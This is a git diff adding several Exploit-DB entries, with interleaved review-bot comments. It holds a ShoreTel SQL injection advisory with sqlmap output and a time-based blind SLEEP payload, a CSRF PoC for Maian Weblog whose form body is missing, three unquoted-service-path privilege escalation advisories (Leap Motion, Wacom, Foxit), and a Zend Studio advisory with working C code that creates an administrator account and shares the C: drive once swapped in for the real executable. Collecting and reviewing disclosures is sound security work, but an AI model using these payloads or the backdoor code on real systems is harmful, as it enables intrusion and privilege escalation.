| +|___|_ |_|_|_|_|__,| _| + |_| |_| http://sqlmap.org + + +[*] starting at 19:59:34 + +[19:59:34] [INFO] parsing HTTP request from 'req.burp' +[19:59:34] [INFO] testing connection to the target URL +[19:59:42] [INFO] checking if the target is protected by some kind of +WAF/IPS/IDS +sqlmap resumed the following injection point(s) from stored session: +- --- +Parameter: username (POST) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (SELECT) + Payload: password=cc03e747a6afbbcbf8be7668acfebee5&password64=dGVzdDEyMw==&redirect=&redirectOnFail=&ticketAsQuery=1&expiry=43200&flashlogin=&ParticipantCode=&username=test123' +AND (SELECT * FROM (SELECT(SLEEP(10)))Qlhs) AND 'jIev' LIKE +'jIev&vpassword=&SUBMIT1=Sign In +- --- +[19:59:54] [INFO] testing MySQL +[20:02:25] [INFO] confirming MySQL +[20:03:12] [INFO] the back-end DBMS is MySQL +web application technology: Apache +back-end DBMS: MySQL >= 5.0.0 +[20:03:12] [INFO] fetching current database +[20:03:12] [INFO] retrieved: [REDACTED] +current database: '[REDACTED]' +[20:21:10] [INFO] fetched data logged to text files under +'/root/.sqlmap/output/[REDACTED].com' + +[*] shutting down at 20:21:10 + +3. Solution: + +Install the latest version of ShoreTel Connect ONSITE +https://support.shoretel.com/kb/view.php?id=kA41A000000XgL6SAK + +Related ShoreTel security bulletin: +https://support.shoretel.com/kb/view.php?id=kA41A000000XgL6SAK diff --git a/platforms/php/webapps/40492.html b/platforms/php/webapps/40492.html new file mode 100755 index 000000000..2291b8d87 --- /dev/null +++ b/platforms/php/webapps/40492.html 
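Review bot: The `- ---` lines around the request and the sqlmap output are dash-escaped `---` separators left over from a PGP clear-signed message and should be restored to `---`, and the "Solution" link and the "Related ShoreTel security bulletin" link are the same URL (kA41A000000XgL6SAK), so one of the two references is probably a copy-paste slip worth checking. The captured request also carries a live-looking PHPSESSID cookie value; for a public advisory it should be redacted like the hostname. The root-cause sentence would be clearer with the fix named: the username value must be bound as a query parameter rather than concatenated into the SQL string, which is what "not sanitised prior to being used in SQL Queries" amounts to here.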
@@ -0,0 +1,35 @@ +# Exploit Title : Maian Weblog 4.0 - Cross-Site Request +Forgery ( Add New Post) +# Author : Besim +# Google Dork : - +# Date : 10/10/2016 +# Type : webapps +# Platform : PHP +# Vendor Homepage : http://www.maianweblog.com +# Software link : + http://www.hotscripts.com/listings/jump/download/21864 + + + + +*########################### CSRF PoC ###############################* + + + + + +
+ + + + +
+ + + + +*####################################################################* diff --git a/platforms/windows/local/40483.txt b/platforms/windows/local/40483.txt new file mode 100755 index 000000000..f0bdee8e3 --- /dev/null +++ b/platforms/windows/local/40483.txt @@ -0,0 +1,29 @@ +Leap service: https://www.leapmotion.com/ +By Ross Marks: http://www.rossmarks.co.uk +Exploit-db: https://www.exploit-db.com/author/?a=8724 +Category: Local +Tested on: Windows 10 x86/x64 + +1) Unquoted Service Path Privilege Escalation + +Leap motion's "LeapService" installs as a service with an unquoted service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system. + +A successful attempt would require the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run with elevated privileges. + +PoC: + +C:\>sc qc LeapService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: leapService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Leap Motion\Core Services\LeapSvc64.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Leap Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/platforms/windows/local/40484.txt b/platforms/windows/local/40484.txt new file mode 100755 index 000000000..0b97b391a --- /dev/null +++ b/platforms/windows/local/40484.txt 
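Review bot: The file is listed as a 35-line CSRF PoC, but the hunk as shown holds only the header comments, the two `CSRF PoC` banner lines and blank lines; no form or submit script appears between the banners, so either the markup was stripped when this page was rendered or the committed file is missing its body. If the latter, the entry is not reproducible and should carry the form it claims to demonstrate; if the former, the rendered text cannot be reviewed for the request it issues. Either way the header would help readers by naming the vulnerable endpoint and the posted parameter names, as the 40481.txt entry in this commit does.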
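Review bot: The advisory shows the unquoted path `C:\Program Files (x86)\Leap Motion\Core Services\LeapSvc64.exe` but never states which directory in that path a non-privileged user can write to; on a default Windows 10 install, standard users cannot create `C:\Program.exe` or files directly under `C:\Program Files (x86)\`, so exploitability hinges on a permissive ACL on one of those directories that the write-up does not demonstrate. A line such as `Writable path component (verify with icacls): <directory>` after the PoC would let a reader judge the real risk; the same gap applies to 40484.txt (`C:\Program Files\Tablet\Pen\`) and 40485.txt (`C:\Program Files (x86)\FOXIT SOFTWARE\FOXIT READER\Foxit Cloud\`). The remediation is also unstated: quoting BINARY_PATH_NAME, e.g. `sc config LeapService binPath= "\"C:\Program Files (x86)\Leap Motion\Core Services\LeapSvc64.exe\""`, removes the ambiguity. The sentence "A successful attempt would require the local attacker must insert an executable file" reads better as "would require that the local attacker insert an executable file".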
@@ -0,0 +1,29 @@ +Wacom Consumer Service: http://www.wacom.com +By Ross Marks: http://www.rossmarks.co.uk +Exploit-db: https://www.exploit-db.com/author/?a=8724 +Category: Local +Tested on: Windows 10 x86/x64 + +1) Unquoted Service Path Privilege Escalation + +Wacom's "Wacom Consumer Service" installs as a service with an unquoted service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system. + +A successful attempt would require the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run with elevated privileges. + +PoC: + +C:\>sc qc WTabletServiceCon +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: WTabletServiceCon + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Tablet\Pen\WtabletServiceCon.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wacom Consumer Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/platforms/windows/local/40485.txt b/platforms/windows/local/40485.txt new file mode 100755 index 000000000..0217f5ffc --- /dev/null +++ b/platforms/windows/local/40485.txt 
@@ -0,0 +1,29 @@ +Foxit Cloud Update Service: https://www.foxitsoftware.com +By Ross Marks: http://www.rossmarks.co.uk +Exploit-db: https://www.exploit-db.com/author/?a=8724 +Category: Local +Tested on: Windows 10 x86/x64 + +1) Unquoted Service Path Privilege Escalation + +Foxit reader's "cloud safe update service" installs as a service with an unquoted service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system. + +A successful attempt would require the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run with elevated privileges. + +PoC: + +C:\>sc qc FoxitCloudUpdateService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: FoxitCloudUpdateService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\FOXIT SOFTWARE\FOXIT READER\Foxit Cloud\FCUpdateService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Foxit Cloud Safe Update Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/platforms/windows/local/40490.txt b/platforms/windows/local/40490.txt new file mode 100755 index 000000000..5fa6b680d --- /dev/null +++ b/platforms/windows/local/40490.txt 
@@ -0,0 +1,134 @@
+[+] Credits: John Page aka hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source: http://hyp3rlinx.altervista.org/advisories/ZEND-STUDIO-PRIVILEGE-ESCALATION.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+============
+www.zend.com
+
+
+
+Product:
+======================
+ZendStudio IDE v13.5.1
+
+Zend Studio is the leading PHP IDE. It is the only PHP IDE that combines mobile development with PHP and includes a sample mobile
+app with source code.
+
+
+
+Vulnerability Type:
+=====================
+Privilege Escalation
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+
+ZendStudio IDE uses weak insecure permissions settings on its files/directory as the “Everyone” group has full access on it.
+Allowing low privileged users to execute arbitrary code in the security context of ANY other users with elevated privileges
+on the affected system.
+
+"Everyone" encompasses all users who have logged in with a password as well as built-in, non-password protected accounts such as Guest
+and LOCAL_SERVICE.
+
+Any user (even guest) will be able to replace, modify or change the file. This would allow an attacker the ability to inject code or
+replace the ZendStudio executable and have it run in the context of the system.
+
+
+e.g.
+
+c:\Program Files (x86)\Zend\Zend Studio 13.5.1> icacls ZendStudio.exe
+
+ZendStudio.exe Everyone:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Users:(I)(RX)
+
+
+x86_64 version ...
+
+
+c:\Program Files\Zend>icacls * | more
+Zend Studio 13.5.1 Everyone:(F)
+ Everyone:(OI)(CI)(IO)(F)
+ NT SERVICE\TrustedInstaller:(I)(F)
+ NT SERVICE\TrustedInstaller:(I)(CI)(I
+ NT AUTHORITY\SYSTEM:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Administrators:(I)(OI)(CI)(IO
+ BUILTIN\Users:(I)(RX)
+ BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+ CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+
+
+
+Exploit code(s):
+===============
+
+1) Compile below 'C' code name it as "ZendStudio.exe"
+
+
+#include
+
+int main(void){
+ system("net user hacker abc123 /add");
+ system("net localgroup Administrators hacker /add");
+ system("net share SHARE_NAME=c:\ /grant:hacker,full");
+ WinExec("C:\\Program Files (x86)\\Zend\\Zend Studio 13.5.1\\~ZendStudio.exe",0);
+return 0;
+}
+
+
+2) Rename original "ZendStudio.exe" to "~ZendStudio.exe"
+
+
+3) Place our malicious "ZendStudio.exe" in the ZendStudio directory
+
+
+4) Logout and wait for a more privileged user to login and use ZendStudio IDE then BOOM!!!!! later,
+go back and login with your shiny new account.
+
+
+
+Disclosure Timeline:
+========================================
+Vendor Notification: September 30, 2016
+October 8, 2016 : Public Disclosure
+
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+
+Severity Level:
+===============
+High
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx